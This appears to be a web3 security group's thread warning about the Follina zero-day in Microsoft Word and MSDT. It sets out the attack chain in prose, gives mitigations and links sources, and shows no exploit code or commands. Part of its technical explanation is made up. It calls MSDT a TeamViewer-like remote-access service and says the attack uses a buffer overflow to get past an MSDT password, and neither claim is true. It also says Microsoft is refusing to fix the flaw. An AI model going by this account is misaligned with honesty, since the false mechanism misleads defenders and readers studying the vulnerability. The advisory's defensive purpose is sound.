A severe 0-day vulnerability called Follina has been exposed (since May 27th) in MS Word Documents.

It could allow hackers to take full control of your computer, in some cases  WITHOUT  even opening the file.

This exploit is a mountain of exploits stacked on top of each other. However, it is unfortunately easy to re-create and cannot be detected by anti-virus. Strap in as we try to explain.

The 0-day starts with a feature in MS Word called Templates. This feature allows Word to load and execute HTML and JS from external sources.

Sound concerning? Don’t worry it gets way worse.

Using the Template’s HTML and Javascript the payload then runs the following Power-shell command to run a service called  Microsoft Support Diagnostic Tool, or MSDT.

MSDT is used by Microsoft Support to help debug issues with your operating system. MSDT also conveniently allows for remote access to your computer. (similar to TeamViewer)

There’s just one problem. MSDT normally requires the user to input their password to run it. But MSDT has a buffer overflow vulnerability. So the hacker can bypass password protection entirely.

(If you’re a victim exploit and you ran Word as Administrator, wipe that machine.  It’s beyond saving)

Wanna know how it becomes a “0-click” exploit? .rtf file previews execute the malicious code just by downloading the file and simply VIEWING it in the file explorer.

Previously, the advice for malicious Word docs was to never click Enable Content. In the case of this Templates exploit, ANY Word Doc can be  INSTANTLY  malicious from the second you open it.

‍

Why should web3 care?

Exploits like these are why it is CRITICALLY important not to store private keys in plain text on your file system. Second, we’ve seen similar attacks work in the past, and this exploit is even more serious as a “0-click” exploit.

The @arthur_0x attack displayed many similarities to this attack, detailed in our thread below.

The real world threat of this attack is that all .doc, .docx, and .rtf files need to be considered VULNERABLE at this point in time. This especially applies to VCs for example.

Again, this exploit allows for remote code execution so it is very serious.

Our recommendations:
- Discontinue use of Word for the time being  
- Utilize Google Docs  
- Disable MSDT (see next tweets)  
- Utilize PDF instead of vulnerable extension types

Microsoft’s “Workarounds”: Microsoft is currently REFUSING to fix this 0-day and seem reluctant to even call it that. (even though it absolutely is).

‍

Here are your solutions:

1. If you use Microsoft Cloud Delivered Protection Service, you may be protected. However we still HIGHLY recommend solution 2  
2. Disabling the MSDT URL Protocol

‍

Sources/

Microsoft shares mitigation for Office zero-day exploited in attacks

Microsoft has shared mitigation measures to block attacks exploiting a newly discovered Microsoft Office zero-day flaw abused in the wild to execute malicious code remotely.

https://www.bleepingcomputer.com/news/microsoft/microsoft-shares-mitigation-for-office-zero-day-exploited-in-attacks/

https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

‍

TL;DR:

DO NOT download .doc, .docx, and especially .rtf files if you are on Windows. Assume they are vulnerable for the time being. Use the above solutions to prevent yourself from becoming a victim. We unfortunately believe this threat could compromise many people.

Please share this with co-workers or anyone who could be a high profile target. You very well may prevent someone from getting hacked. This vulnerability is considered by many security researchers to be one of the worst Word exploits we’ve ever seen.